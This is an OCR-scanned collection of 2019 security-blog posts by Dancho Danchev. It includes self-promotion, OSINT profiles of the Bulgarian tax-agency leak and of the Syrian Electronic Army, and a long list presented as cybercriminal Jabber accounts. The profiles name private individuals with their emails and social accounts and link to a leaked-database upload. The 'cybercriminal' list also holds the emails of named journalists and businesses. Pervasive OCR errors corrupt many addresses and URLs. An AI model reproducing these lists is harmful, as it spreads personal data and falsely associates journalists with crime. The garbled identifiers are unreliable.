The Future of Cyber Warfare - Hacking and Cyber 
Security Community - with public registration now open. 

How you can help? 

- Register today! 

- Share this post with friends and colleagues. 

- Approach me at dancho.danchev@hush.com with your 
comments feedback and general suggestions 

Stay tuned! 

1. https://offensive-warfare.com/ 
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Proprietary Threat Intelligence Reports Available On 
Demand - Request a Copy Today! (2019-05-28 20:46) 

Dear blog readers -1 wanted to let everyone know of two - 
currently in the works - proprietary Threat Intelligence 



type of reports - that you and your organization can easily 
acquire on demand. The first report details in-depth 

including tactics techniques and procedures including 
hundreds of lOCs (Indicators of Compromise) in terms of the 

Pay-Per-lnstall Business Model circa 2008 - worth $1,500 
and the second report which is also available on demand 

details the inner workings of the CAPTCHA-Solving 
Underground Market Business Model - which is also worth 
$1,500. 

Similar my most recently - now publicly available - report 

on 11 [l]Assessing The Computer Network Operation 
(CNO) 

Capabilities of the Islamic Republic of Iran - Report" 

capabilities including a complimentary social network graph 
- the proprietary Threat Intelligence reports can be 
requested online - and the user including the organization 
will receive a 

complimentary copy of the report - including a possible 
attribution vector - within 30 days prior to making a 
purchase. 

How you can order a copy of the report? 

Feel free to approach me at dancho.danchev@hush.com to 
inquire about making a purchase. 

Stay tuned! 

1. https://ddanchev.blo as DOt.com/2015/Q7/assessin a- 
computer-network-Qperation_29.html 
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Proprietary Cybercrime and Dark Web Forum Search 
Engine - BETA Access Available! (2019-05-28 20:48) 

Dear blog readers -1 wanted to let everyone know of a 
currently active BETA project - namely - the general invite- 

only proprietary access to a Cybercrime and Dark Web 
Underground Forum Search Engine - exclusively targeting 

Security Vendors the U.S Intelligence Community and Law 
Enforcement including independent-vetted invite-only 

subscription-based access to the World's largest and near- 
real-time repository of Cybercrime Research Data - worth 

$3,500 in the form of one-time payment - for the purpose of 
fueling growth into the project - and to request the 

necessary access - including possible subscription-based 
agreement - further fueling growth into the project and the 

quality of the inventory of data. 

How to request access? 

Feel free to approach me at dancho.danchev@hush.com 
with your inquiry in terms of this project. 

Stay tuned! 
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Dancho Danchev's Blog - Public Comments Now 
Open! (2019-05-29 08:38) 

Dear blog readers, 

Ever since 2005 where I originally launched this blog -1 
decided to turn off public comments so that I can 

present a decent portion of my Information Security 
knowledge to a diverse set of audiences. Back in the 
glorious 

Web 2.0 years when I was busy doing business development 
and PR outreach for a variety of Security Projects I've 

recently decided that the time has come to open public 
comments on one of the Security Industry's most popular 

personal blogs on Information Security Cybercrime Research 
and Threat Intelligence with the idea to reach out to 

everyone reading this blog potentially building a high- 
quality comment and research feedback network of Security 

Industry members U.S Intelligence Community members 
and the general public. 

Looking forward to receiving your comments - and as always 
feel free to go through the archives to catch up 

with what I've been up to. 

Stay tuned! 
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Dancho Danchev's Blog - Audio Version Available - 
Listen to Every Post! (2019-05-30 16:15) 

Dear blog readers, 

I wanted to let everyone know that I've recently introduced 
an audio-listening functionality to every blog post 

basically allowing you to listen to every blog post on this 
blog. What do you think? 

Basically it allows you to easily plug and play your head-set 
and listen on current historical and upcoming 

posts. Stay tuned for an updated set of features to be 
implemented anytime soon. 

Consider going through the following high-profile Security 
Interviews which I managed to produce throughout 

2003-2006 while working for [l]Astalavista Security 
Group. 

- [2]Security Interviews 2004/2005 - Part 1 

534 

- [3]Security Interviews 2004/2005 - Part 2 

- [4]Security Interviews 2004/2005 - Part 3 

including the following commentary and Open Letter to the 
U.S Intelligence Community: 

- [5]The Threat Intelligence Market Segment - A 
Complete Mockery and IP Theft Compromise - An 
Open Let- 



ter to the U.S Intelligence Community 

Enjoy and stay tuned! 

1. https://packetstQrmsecuritv.com/files/author/30Q7/ 

2. https://ddanchev.blo as pot.com/2Q06/Ql/securit v- 
interviews-2QQ42QQ5-part-l.html 

3. https://ddanchev.blo as pot.com/2QQ6/Ql/securit v- 
mterviews-2Q042QQ5-part-2.html 

4. https://ddanchev.blo as pot.com/2QQ6/Ql/securit v- 
1 nterviews-2QQ42QQ5-part-3.html 

5. https://ddanchev.blo as pot.com/2Q19/Ql/the-threat- 
intelli a ence-market-se a ment.html 
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Upcoming Security Project - Accepting Donations and 
Feedback! (2019-05-30 17:11) 

Dear blog readers I wanted to let everyone know that I've 
recently added a "Donate Today!" button including a 

Pop-Up banner within my blog with the idea to [ljseek you 
donations and feedback to raise the necessary capital 

for an upcoming Security Project. 

How you can contribute in case you're a long-time reader of 
this blog - and want to possibly see more high- 

quality Security and Cybercrime research? Consider making 
a modest $500 donation - which will better help me to 






















scale the project and eventually launch it. 

Feel free to approach me at dancho.danchev@hush.com 
Stay tuned! 

1. https://form. i otformeu.com/91473099551363 
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Upcoming Offensive Warfare 2.0 Cyber Security and 
Hacking Community YouTube Livestream Broadcast 

- RSVP Today! (2019-07-02 11:17) 

Dear blog readers, 

I wanted to let everyone know that I'll be doing a Live 
YouTube Broadcast - this Friday - 05/07/2019 20:30 

P.M - Eastern European Summer Time (EEST), UTC +3 in 
terms of [l]my newly launched Offensive Warfare 2.0 - 

Cyber Security and Hacking Community. Are you 

interested in attending and learning more about the 
project? 

[2JRSVP Today and consider [3]registering to get the 

conversation going! 

Feel free to approach me dancho.danchev@hush.com 




Stay tuned! 

1. https://www.offensive-warfare.com/blo a s/entrv/l- 

offensive-warfare-20-offidal-commun it v-launch- 

announcemen 


t/?ct= 1562058688 

2. https://offensive-warfare.a p p.rsv pif v.com/ 

3. https://www.offensive-warfare.com/re a ister 
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Exposing Bulgaria's Largest Data Leak - An OSINT 
Analysis (2019-07-27 10:46) 

I've recently came across to a news article detailing the 
recently leaked Bulgaria NAP records database and I 
decided 

to take a closer look. What does this leak basically 
constitute? Basically the attacker managed to compromise 
the 

security of the Web Site basically leading to a successful 
extraction of a decent-portion of data which could basically 

constitute a leak. 

NOTE: The data in this analysis has been obtained using 
public sources. 
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In this post I'll profile a novice Bulgaria-based cybercriminal 
that basically managed to obtain access to the 

database and shared it within several cybercrime-friendly 
forum communities making it publicly accessible including 

an in-depth overview of TAD Group which is basically a 
Bulgaria-based penetration testing company. 

Real Name: Daniel Ganchev - Email: 
dani el.ganchev@abv.bg 

Sample URL of the cybercriminal involved in the 
campaign: 

hxxp://instakilla.com/ - Email: wp@instakilla.com; 
info@instakilla.com 

Instagram Account: hxxp://www.instagram.com/instakilla 
_/ 
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Bitcoin address used in the campaign: 

3Ex6LeHorgRjkBmws4SsRZ3FXSJDXk5FhP 

Sample additional domain known to have been used 
by the same individual: hxxp://209.250.232.143 

Related URLs known to have participated in the 
campaign: 


https://instakilla.com/5k.txt 


https://instakilla.com/teaser.txt 

Sample Screenshot of the Original Letter Send to 
Journalists: 
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Let's take a closer look at the Bulgaria-based TAD-Group is 
basically a well-known penetration testing company 

currently running Bulgaria's largest and most popular 
hacking forum community - hxxp://www.xakep.bg which 
was 

recently blamed for Bulgaria's largest database leak in 
particular its founders and several employees in the context 

of performing an OSINT analysis basically highlighting some 
of the key functions of the company and its involvement 

in the incident. 

Sample Company Logo: 
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Sample Hacking Forum Logo: 

Sample Exploits Developed courtesy of the founder 
of the group: 

Sample Photos of TAD Group Employees: 
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Sample TAD Group Photos: 
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Related personally identifiable information of TAD 
members: 

Real Name: Ivan Todorov 

Email: todorov _i@tadgroup.com; todorov_i@subway.bg 

Related social network accounts: 

hxxp://g ithub.com/chapoblan 
hxxp://www.facebook.com/chapoblan/ 

Sample Bulgaria Leaked Database URL: 

hxxp://uploadfiles.io/slp3gzh8 

Sample Email known to have been used in the 
campaign: 


Email: minfin _leak@yandex.ru 

Sample MD5 known to have been used in the 
campaign: 

MD5: 3125f2f04d3bac84c418ceb321959aba 

It's also worth pointing out that I've managed to come 
across to a fraudulent proposition courtesy of the 

hxxp://www.xakep.bg cybercrime-friendly forum 
community with the cybercriminal behind it currently 
soliciting 

managed hacker-for-hire type of services. 

Sample screenshots courtesy of the service: 
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We'll be keeping an eye on the campaign and we'll post 
updates as soon as new developments take place. 

553 

Who's Behind the Syrian Electronic Army? - An OSINT 
Analysis (2019-07-28 18:19) 

Continuing the " [1]FBI Most Wanted Cybercriminals 11 

series I've decided to continue providing actionable threat 
intelligence on some of the most prolific and wanted 
cybercriminals in the World through the distribution and 

dissemination of actionable intelligence regarding some of 
the most prolific and wanted cybercriminals. 

Following a series of high-profile Web site defacement and 
social media attack campaigns largely relying on 

the utilization of good-old-fashioned social engineering 
attack campaigns - it appears that the individuals behind 
the 

Syrian Electronic Army are now part of [2]FBI's Most 
Wanted Cyber Watch List which means that I've decided 
to 

conduct an [3]OSINT analysis further sharing actionable 
intelligence behind the group operators with the idea to 


assist law enforcement and the U.S Intelligence Community 
with the necessary data which could lead to a successful 

tracking down and prosecution of the team behind these 
campaigns. 

In this post I'll provide actionable intelligence on the group 
behind the Syrian Electronic Army including action¬ 
able intelligence on the infrastructure on some of their most 
prolific social engineering driven campaigns. 

Sample Personal Photo of Ahmad Al Agha: 
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Sample Personal Photo of Firas Nur Al Din Dardar: 
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Sample Web Site Defacement Screenshot courtesy 
of "The Shadow": 
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Sample Screenshots of the Syrian Electronic Army 
Web Site Defacement Activity: 
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Related domains known to have participated in the 
campaign: 

hxxp://quatar-leaks.com 

hxxp://net23.net 

hxxp://secu reids.washpost.net23.net 
hxxp://mail.hrw.net84.net 
hxxp://sou Lwebsitewelcome.com 

hxxp://blog.conservatives.com/wp=content/uploads/cnn.ph 

P 

hxxp://i khwansuez.net/cnn.php 


hxxp://klchr-pshr.com/bo.php 

hxxp://g I oryshipsghana.com/wh.php 

hxxp://centriplant-dev.coreware.co.uk/wp- 

content/blogs.dir/ob.php 

hxxp://del iveryroutes.co.uk/ch.php 

hxxp://sws-schu len.de/gn.php 

hxxp://sws-schu len.de/ut.php 

hxxp://ku lalars.com/jwt.php 

hxxp://karisd iscounts.com/nasa.php 

Related IPs known to have participated in the 
campaign: 

hxxp ://91.144.2 0.7 6 

hxxp 7/194.58.88.156 

hxxp 7/88.212.209.102 

hxxp 7/141.105.64.37 

hxxp 7/213.178.22 7.152 

hxxp 7/8 2.13 7.2 48.2 

hxxp 7/82.137.200.5 

hxxp 7/94.2 5 2.2 49.94 

hxxp 7/5.149.101.187 

hxxp 7/8 2.13 7.2 48.3 



hxxp ://76.73.101.180 

hxxpV/82.137.248.3 
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hxxp7/81.137.248.4 

hxxp 7/82.137.248.5 

hxxp 7/82.137.248.6 

hxxp 7/91.144.18.219 

hxxp 7/17 8.5 2.134.163 

hxxp7/78.46.142.27/ WH 

hxxp7/78.46.142.27/ Syrian 

hxxp 7/46.17.103.125 

hxxp 7/46.5 7.13 5.14 

hxxp 7/188.139.245.9 

hxxp 7/82.137.2 50.2 35 

Social Media Accounts: 

hxxp7/twitter.com/Official _SEA 

hxxp7/twitter.com/ThePro _Sy 

hxxp 7/instag ram.com/official _sea3/ 

hxxp 7/pi nterest.com/officialsea/ 

hxxp 7/www.facebook.com/sea.theshadow.716 



hxxp ://l inkedin.com/pub/th3pr0-sea 

hxxp://pl us.google.com/1164711875953152 37633 

hxxp ://fl ickr.com/photos/th3pr0 

hxxp ://fou rsquare.com/user/29524714 

Skype account IDs known to have participated in the 
campaign: 

Syria.sec 

koteba63 

koteba 

sea.shadow3 

the.shadow21 

tiger.white20 

nana.saifolO 

nana.saifo 

Related emails known to have participated in the 
campaign: 

th3pr012 3-ap2@gmail.com 
th3pr0123@gmail.com 
whitehouse-online@hotmail.com 
whitehouse _online@hotmail.com 
sea.the.shadow@gmail.com 



leakssyrianesorg@g mail, com 

leaks.syrianes.org@g mail, com 

Syrian.es.sy@gmail.com 

syrianessy@gmail.com 

sea.wr4th@gmail.com 

prO@hotmail.nl 

sy@hotmail.com 

sy34@msn.com 

killboy-1994@hotmail.com 

jlO@hotmail.com 

cf3@hotmail.com 
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zq9@msn.com 

doom.ceasar@gmail.com 

y8p@hotmail.com 

rql@hotmail.com 

cf3@hotmail.com 

wassemkortab@yahoo.com 

sf0725zq0330@dressmall.com 

adam.magdissi@hotmail.com 



bf6@hotmail.es 

b-6f@hotmail.com 

bg _@hotmail.com 

asdelylord@hotmail.com 

i-8u@hotmail.com 

b-8q@hotmail.com 

tiger.tiger248@gmail.com 

nagham _saifo@hotmail.com 

edwinjouhansyah@gmail.com 

sea.coders@hotmail.com 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 

1. https://ddanchev.blo as DOt.com/2Q19/Ql/exposin a -irans- 
most-wanted.html 

2. https://www.fbi. a ov/wanted/cvber/ahmed-al-a a ha 

3. https://www.fbi. a ov/wanted/cvber/firas-dardar 
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Profiling a Currently Active Portfolio of High-Profile 
Cybercriminal Jabber and XMPP Accounts 


(2019-07-29 17:05) 













In a world dominated by [l]fraudulent propositions it 

should be noted that Jabber and XMPP remain the primary 

secure communication channel for a large portion of 
cybercrime-friendly propositions that I come across to on a 

daily basis largely relying on [2]Off-The-Record type of 
functionality. 

I've recently came across to a public list of harvested and 
data-mined high-profile cybercriminal's Jabber ac¬ 
counts and I've decided to share it with my blog readers for 
the purpose of establishing the foundations for a 

successful 11 [3]lawful surveillance" and 11 [4]lawful 
interception" type of operational activity. 

0-day@jid.pl 

000111999@jabbim.com 

000111@jabber.cz 

000@jabster.pl 

000tolkin@xmpp.jp 

001001@default.rs 

0025@0nllne.at 

007192@darkdna.ne 

007192@exploit.im 

007192@monopoly.cc 



007bond@jabber.hot-chilli.net 

00@jabbim.sk 

00ff@xmpp.jp 

01.234.56@exploit.im 
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01001011@xmpp.jp 

010101@exploit.im 

02xpos@exploit.im 

02xpos@zoho.com 

0901@xmpp.jp 

0@jabber.ru 

0@jabber.rue 

0a04xd4@riseup.net 

Ochiaki@xmpp.cm 

Odaybot@exploit.im 

Odayexp@exploit.im 

Ody@exploit.im 

Omg@riseup.net 

Onton@swissjabber.ch 

Opt!c@thesecure.biz 



Opt@exploit.im 

Outsider@jabber.se 

0x0@jabber.se 

0x22hash@crypt.mn 

0x22hash@exploit.im 

0x3r@rows.io 

0x40@sj.ms 

0x43@exploit.im 

0x4h4x@evil.im 

0x736a@jabber.de 

0x90@darkness.su 

0xbad40298@secu rejabber, me 

Oxcsrf@rows.io 

0xdadallc7@exploit.im 

0xdadallc7@jabber.ru 

Oxfff@exploit.im 

0xgs@jodo.im 

1000@creep.im 

10010000@exploit.im 

1001001@default.rs 



100100@xmpp.ru 

1001wvwv@dlab.im 

1003001@exploit.im 

100820@jabber.ru 

100btc-exchange@exploit. 

100key@jabber.at 

100kotob@xmpp.jp 

101-201@exploit.im 

101@infraud.cc 

101@sj.ms 

102@police.ua 

1047@crypt.mn 

1047@exploit.im 

106655@iera.de 

10@exploit.im 

567 

10k@zloy.im 

111000@exploit.im 

111333888@darkjabber.cc 

111666@jabme.de 



111777@korovka.pro 

lll@mpro.la 

1122331144999@limun.org 

1122334@xmpp.jp 

112233@darkjabber.cc 

112233@exploit.im 

112234@exploit.im 

1183498@jabber.se 

123321qq@xmpp.jp 

1234567@exploit.im 

1238123@dukgo.com 

1238123@privatjabber.com 

123abc@default.rs 

1337@jabbim.cz 

1337day@jabber.org 

1337face@digitalgangster.com 

13@headcounter.org 

13ice37@jabber.ccc.de 

150456@jabber.at 

16443@xmpp.jp 



1777@exploit.im 

17code@xmpp.jp 

18*@jwchat.org 

1941@swissjabber.li 

1988@xmpp.jp 

l????1777@exploit.im 

l@l.com 

l@chatme.im 

l@crypt.am 

l@exploit.im 

l@fuckav.in 

l@jabber.se 

l@monopoly.cc 

l@mpro.la 

l@seva.club.tw 

l@wwh.ms 

laccseller@jabber.dk 

lallkeyl@pandion.im 

lbalorcim@jabber.ru 

lchan@conference.jabber.ru 



lchan@jabber.ru 

lchanca@conference.sj.ms 

leo@exploit.im 

lhanl@jabber.ru 

lhelsenki@exploit.im 

lheymickeyl@xmpp.jp 
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ljz@hot-chilli.net 

ljz@inbox.im 

lmalikl@exploit.im 

lne@exploit.im 

Inf3rn0@jabber.at 

Inf4m0us@swissjabber.ch 

lnsider@jabber.cd 

lnsider@xmpp.jp 

lnvls@exploit.im 

lojkra@exploit.im 

loo@exploit.im 

lpacl@exploit.im 

lrezzzz@exploit.im 



lse@j a bber.se 

lsss@exploit.im 

lst@default.rs 

lstetcgoldmedal@dukgo.com 

lwlwlwl@xmpp.jp 

2015mad@0nllne.at 

201org@jabbim.sk 

202010@exploit.im 

202????10@exploit.im 

206ywoodnya206@jabber.ru 

20snow@germanyhusicaysx.onio 

20snow@germanyhusicaysx.onion 

212@jabster.pl 

220usd@exploit.im 

22222193@jabber.cz 

222333@darkjabber.cc 

222ssn@securetalks.biz 

2251791683@qq.com 

228@swissjabber.ch 

231@live.fr 



23@li.fr 

24hackjb@exploit.im 

24imp@xmpp.jp 

24karat@im.apinc.org 

2517@xabber.de 

2577525@exploit.im 

26102016@exploit.im 

2688@0nllne.at 

289415@thesecure.biz 

2@exploit.im 

2b51df8ba5@jabber.calyxinstitute.org 

2d@exploit.im 

2day@swissjabber.ch 

2face@exploit.im 

2garin@prv.name 

2garinfox2@jabber.se 

2min@jabber.ccc.de 

569 

2r4b@jabber.prtship.com 

2spylopez@im.apinc.org 



2tracks@jabber.se 

2undoxable@blah.im 

303@riseup.net 

306yonge@jabbim.com 

30715@thiessen.it 

3077324@xmpp.jp 

309h@dlab.im 

30topandexp@swissjabber.ch 

3123@exploit.im 

31337elite@jabber.no 

31415926@exploit.im 

321321@jabbim.pl 

3245@jwchat.org 

327@prv.name 

333000@jabber.ccc.de 

33333353@jabber.ru 

333993339@exploit.im 

337788@chatme.im 

337788@drauger.de 

337788@draugr.de 



337788@im. apinc.org 

352623@0nllne.at 

3708111@exploit.im 

39781@jabber.cz 

3@exploit.im 

3ahyga@fuckav.in 

3am@exploit.im 

3ddd@dukgo.com 

3fr33t@swissjabber.ch 

3n3***@jabber.ru 

3n3rgie@jabber.ru 

3trino@exploit.im 

3xplr3@ch3kr.net 

3xpl01t@exploit.im 

3xploit@chatme.im 

3zzy@jabber.ru 

4.ukdeadfullz@xmpp.jp 

4.vevzoroaster@xmpp.jp 

4.xxakep@exploit.im 

404@xmpp.jp 



437282@xmpp.jp 

445775263@qip.ru 

44616@exploit.im 

454@jabber.cz 

4550085@qip.ru 

4601020@xmpp.jp 

474754547@jabber.no 

477577@sj.ms 
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479973@hackforums.im 

4878731@cq86831.twsite.de 

489452@jabb.im 

489452@jabbim.com 

489452@jabme.de 

492962059@xmpp.ru 

4?mstore.com@jabber.de 

4?mstore. com@xmpp.jp 

4@jabber.de 

4asovschik@exploit.im 

4ayneg@jabber.org 



4dler@exploit.im 

4dler@jabb.im 

4ester@exploit.im 

4ngel@germanyhusicaysx.onio 

4ngel@germanyhusicaysx.onion 

4pda.ru@jabber.ru 

4sh!r@sj.ms 

4thewin@exploit.im 

5.14.cic@pandion.im 

50055550@exploit.im 

503@xmpp.jp 

517611@jabber.cz 

524362@jabbim.com 
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tutah@jabber.org 

two@xmpp.jp 

tylersmit@xmpp.jp 

tyupkin@xmpp.jp 

udu4a@exploit.im 

uklbvv@swissjabber.ch 



uknowme@exploit.im 

ukropukur@xmpp.jp 

ukrshopharkivrz@xmpp.jp 

ukrshopod@xmpp.jp 

umbaOumba@xmpp.jp 

unbreakable@jabber.root.cz 

unknownkind@jabber.org 

unknownko@xmpp.jp 

urbanlab@xmpp.jp 

usa@jabbim.cz 

user365@xmpp.jp 

usernames@xmpp.jp 

usha@exploit.im 

uski@exploit.im 

uski@xmpp.jp 

usod@exploit.im 

v4@thesecure.biz 

v4s@xmbtc.jp 

v4s@xmpp.jp 

v _i _p@xmpp.jp 



vacaco@exploit.im 

vailt@swissjabber.ch 

vailt@xmpp.jp 

vainet@xmpp.jp 

valentin@exploit.im 

validus@dlab.im 

vasyanl51515@xmpp.jp 

vasyb22008@xmpp.jp 

vbvcard@xmpp.jp 

vbvman@jabbim.cz 

vbvman@sj.ms 

vegass77@jabber.ru 

venkings@xmpp.jp 

verified.garant@xmpp.jp 

verified.st@exploit.im 

versin@exploit.im 

vestl@exploit.im 

veter@jabbim.sk 

vexel@xmpp.jp 
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vigi@exploit.im 

vigi@xmpp.jp 

vinnipuh@xmpp.jp 

vinny@exploit.im 

vintertur@jabber.no 

virtuon@jabber.org 

vitall2345@jabber.ru 

vivalacuba@jabbim.com 

vivalacuba@xmpp.jp 

vivi22@xmpp.jp 

vizg@xmpp.jp 

vladislavaba@xmpp.jp 

vld _support@exploit.im 

vo _dela@Onllne.at 

volandino@jabber.se 

volhav@exploit.im 

volhav@jabber.se 

voodoo _child@xmpp.jp 

vorbis@exploit.im 

vorengom@exploit.im 



voronana@jabber.org 

voucher_exchange@xmpp.jp 

vovascan@exploit.im 

vox7@jabber.org 

vpnlab@xmpp.jp 

vure@exploit.im 

vyvanse@exploit.im 

vzzha@xmpp.jp 

w-f-h@xmpp.jp 

w3bc0d3r@xmpp.jp 

warnerbros@exploit.im 

warpul.center@jabbim.com 

warpul.center@xmpp.jp 

waste@xmbtc.jp 

waste@xmpp.jp 

water787@jabber.org 

waydam@exploit.im 

webprofile@xmpp.jp 

websanta666@xmpp.jp 

webserver@jaim.at 



weby@exploit.im 

wellsfargo@jabber.cz 

wellsfargo@sj.ms 

wfh@xmpp.jp 

white.rabbit@xmpp.jp 

white _black@xmpp.jp 

whitedwarf@xmpp.jp 

whiterabbitsupp@xmpp.jp 

whitesmoker@xmpp.jp 

winlock@xmpp.jp 
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wizduck@exploit.im 

wolf_online@jabber.org 

workpride@xmpp.jp 

wu-tanilada@xmpp.jp 

wwh _study@xmpp.jp 

x-ware@exploit.im 

x013@xmpp.jp 

x@exploit.im 

xakep.ru@jabber.org 



xakevo@xmpp.jp 

xatuko@exploit.im 

xaxaxa43@jabber.kiev.ua 

xchange@exploit.im 

xehanort@exploit.im 

xehanort@jabber.org 

xein.x@exploit.im 

xelper@exploit.im 

xeru@blah.im 

xerucide@blah.im 

xerucide@jabber.org 

ximik.help@xmpp.jp 

xoogsade@xmpp.jp 

xooowlilwooox@jabber.org 

xxlsandora777@exploit.im 

xyz888sup@xmpp.jp 

y2k@thesecure.biz 

yagpanzer@exploit.im 

yam@jabber.org 

yarat@jabber.no 



yasen@exploit.im 

yep@xmbtc.jp 

yezzzshop@xmpp.jp 

ymsmd@jabber.org 

youngrasta@exploit.im 

youngrasta@rows.io 

yrl@xmbtc.jp 

yukkuri _sinai@jabber.cz 

yukkuri _sinai@xmpp.jp 

zlnked@xmpp.jp 

z3r0@exploit.im 

z3r0code@jabber.cn 

zbyer@cnw.bz 

zemela@jabber.org 

zerOday@xmpp.jp 

zerg557@jabber.org 

zerg557@jabber.ru 

zerohero@xmpp.jp 

zerotrack@xmpp.jp 

zhulikk@xmpp.jp 



zigma@jabber.org 
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ziigger88@exploit.im 

zinkpro@exploit.im 

zip@exploit.im 

zipp777@exploit.im 

zlobnijg@exploit.im 

zone45@neko.im 

zorgl@exploit.im 

zservers@xmpp.jp 

zservers@xmpp.ru 

zubr24@exploit.im 

zudosek@xmbtc.ru 

zudosek@xmpp.ru 

zyklon@jabber.org 

0a04xd4@tutanota.com 

Orn@protonmail.com 

0xdl5abled@evil.im 

lup@creativemindfra.me 

404notfound@jabber.calyxinstitute.org 



6d46cb54al@jabber.calyxinstitute.org 

aaron.rogan@the-times.ie 

abby@miku.li 

acldbltch3z@riseup.net 

acouts@thedailydot.com 

actaeOn@null.pm 

activaah@xmpp.jp 

admin@2sec4u.com 

admin@8ch.net 

admin@cyberwarnews.info 

admin@spainsquad.com 

ak8@wtfismyip.com 

alex.hern@theguardian.com 

alex@backroom-entertainment.de 

algod@riseup.net 

aln@evil.im 

amateurz@riseup.net 

angelique _1991@mail.ru 

anil@dashes.com 

anonymousteam@jabber.se 



anxiety@live.ru 

archos@xmpp.ru 

arlington@og.lc 

ashley _feinberg@wired.com 

asio _are _skids@exploit.im 

assessoria@boogienaipe.com.br 

autisml@nigge.rs 

autismusprimus@exploit.im 

aza@xmpp.jp 

blnary@jabber.ccc.de 

bang@nigge.rs 

banksy@pomf.cat 
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bd061@xmpp.jp 

beezysama@reborn.com 

bellaeikomedia@me.com 

ben.jacobs@theguardian.com 

ben.sullivan@vice.com 

beng2@nebengers.com 

berry@gorf.club 



berry@shitposter.club 

berserk@darkness.su 

bigbootyitaly@libero.it 

bigstrongblackman@jabber.at 

binaryproxy@protonmail.com 

bio@exploit.im 

bitchiest@jabber.org 

blackknight _@xmpp.jp 

bltsandwhich@riseup.net 

blue@pandafunk.com 

blunts@420blaze.it 

bookings@fredospazz.com 

braziliancyberarmy@protonmail.com 

breaches@protonmail.ch 

breaches@secu rejabber, me 

bula@xmpp.jp 

bulwark@riseup.net 

business@darerising.gg 

business@imallexx.com 

business@silversanction.com 



c43p3r@protonmail.com 

cancer@cocaine. ninja 

candyplz@riseup.net 

carbonic@riseup.net 

casper@xmpp.cm 

catsmeowalot@cock.li 

cayman@sks-media.co.uk 

chapters@xmpp.jp 

chris.hamby@buzzfeed.com 

clOge@exploit.im 

clayton@soar.gg 

cody@soundrink.com 

coldblooded@crypt.mn 

comandos@protonmail.com 

contact@cappconcepts.gg 

contact@dzresurge.net 

contact@govtslaves.info 

contact@inthesolarhq.com 

contact@megaran.com 

contact@sktagency.com 



contact@thejg.xyz 

contact@thejoinery.jp 

contact@ultraarena.com 
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contact@vazzera.com 

contact@viralized.com 

contacto@ecamptalent.com 

contato@marcogomez.com.br 

cosmo@viral.net 

covertthegod@exploit.im 

craig.silverman@buzzfeed.com 

criminal@live.ca 

criminal@live.ie 

criminal@live.nl 

curavit@protonmail.com 

cwn@riseup.net 

cybercored@protonmail.com 

dOxology@protonmail.com 

d3f4ult@protonmail.ch 

d4ne@riseup.net 



d4rkmOnk@protonmail.ch 

d@gnu.gr 

dal@riseup.net 

dana@entitledmgmt.com 

darkdreamer@xmpp.jp 

darkmatter@jabber.se 

darkmatter@xmpp.jp 

dayna@archeryclub.net.au 

de7in@xmpp.jp 

decemate@evil.im 

defiant@creep.im 

defiant@crypt.mn 

dgsec@dukgo.com 

dgsec@sigaint.org 

dinlas@jabber.calyxinstitute.org 

dlarter@navytimes.com 

dmca@leoblakecarter.co 

dongus@420blaze.it 

dopable@jabb.im 

downsecbelgium@protonmail.com 



dreamer45@protonmail.com 

drozsqt@riseup.net 

duffy.conor@abc.net.au 

economicmayhem@suchat.org 

eduardo@adie.com.br 

egeller@politico.com 

ekinetz@ap.org 

elcat@riseup.net 

elgOdO@elgOdO.club 

elliot _axor@creep.im 

ellyel8@jabber.ccc.de 

email@andrewalker.uk 

emz@redreserve.org 

endodw@protonmail.ch 
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enquiries@ctl-artists.com 

eve@hackerhuntress.com 

evilkermit@protonmail.com 

explOit@xmpp.jp 

exploitkit@jabb3r.org 



fOx@jabber.vc 

federal@exploit.im 

felon@thug.org 

fermi _cryptostorm@jabber.calyxinstitute.org 

finesse@xmpp.jp 

finessekid@exploit.im 

flashy lol@exploit.im 

flex@fbi.al 

floppy@riseup.net 

formal@jabber.lqdn.fr 

g4mm4@xmpp.jp 

gamergatecouncil@redchan.it 

geoff@gwhite.info 

gerard.tubb@sky.uk 

gfc@swissjabber.ch 

ghetto@trendssocial.com 

ghostre4per@jabber.calyxinstitute.org 

globalanarch@creep.im 

god@father.net 

grantd@csps.com 



greg.mil ler@washpost.com 

grim@crimin.al 

h07wir3@jwchat.org 

h4xofficial@protonmail.com 

hackerorientado@protonmail.com 

heather@atlastalent.com 

hello@rachaelpr.com 

hello@yesqarts.com 

help@quantumbooter.net 

helpedsnowden@protonmail.com 

hi@getmefamous.com 

hi@jaxxangency.com 

hicks@5550199.com 

hinamore@jabb3r.org 

host@Oday.ms 

iduncan@baltsun.com 

ih8sn0w@ih8sn0w.com 

include@swissjabber.ch 

infinity@jabber.se 

info@andresoriano.com 



info@belizehub.com 

info@bizarremanagement.com 

info@downloadmoreram.com 

info@hackersonlineclub.com 

info@ic3d.net 
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info@kismetrecords.com 

info@pabucumunlordu.com 

info@radiusartists.com 

info@romero.com 

info@tubehouse.tv 

info@year0001.com 

inpurity@xmpp.jp 

inquiries@lucky7gaming.org 

inquiries@slogansocial.com 

intrusive@riseup.net 

investigations@thomsonreuters.com 

isba.tech@szcua.org 

j.evers@protonmail.ch 

j4x@exploit.im 



j@silosec.org 

janawinter@protonmail.com 

jason@soar.gg 

jasper.hamill@the-sun.co.uk 

jenna.mclaughlin@foreignpolicy.com 

jfcox@jabber.ccc.de 

jihad@muslim.com 

joe.mullin@arstechnica.com 

john.muyskens@washpost.com 

jonas.rest@manager-magazin.de 

jordan.smith@theintercept.com 

joseph.cox@vice.com 

josh.butler@huffingtonpost.com.au 

josh@fbi.tf 

k2@evil.im 

kaliroot@xmpp.jp 

kantorkel@ffnord.net 

kayntias@digitalgangster.com 

kelly.bourdet@gizmodo.com 

kelly@rm-rf. ninja 



kermit@evil.im 

khal id info@righthandmusicgroup.com 

khall@theregister.com 

kiwiz@redreserve.org 

kodak@blah.im 

komodough@exploit.im 

kpn@tuta.io 

kriminal@creep.im 

kurizma@eunited.gg 

laksoh@darerising.gg 

lasgodfather@xmpp.jp 

layer7inc@protonmail.com 

leakbase@creep.im 

leakedsource@chatme.biz 

leviunknown@jappix.com 

lolcow@crypt.mn 
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lounge@dead. ire. land 

ls@nigge.rs 

luke@naventic.gg 



Iukegirgis@belikechildren.com 

mOnk@jabber.calyxinstitute.org 

madler@paradigmagency.com 

manager@brihansuarez.pe 

matt@afterdarkartists.com 

matt@freenode.net 

matt@philie.com 

mattmrx@csa.gg 

maul@evil.im 

maven@csa.gg 

max.hoppenstedt@vice.com 

maxheadroom@digitalgangster.com 

mb@xato.net 

mckayla@jabber.se 

md5@xmpp.jp 

md5@xmpp.land 

me@godly.net 

mena.mikhail@aol.com 

menuxi@riseup.net 

merce@protonmail.ch 



mg mt@drelondon.com 
mgordon@fullscreen.com 
mgt@christanlgrant.com 
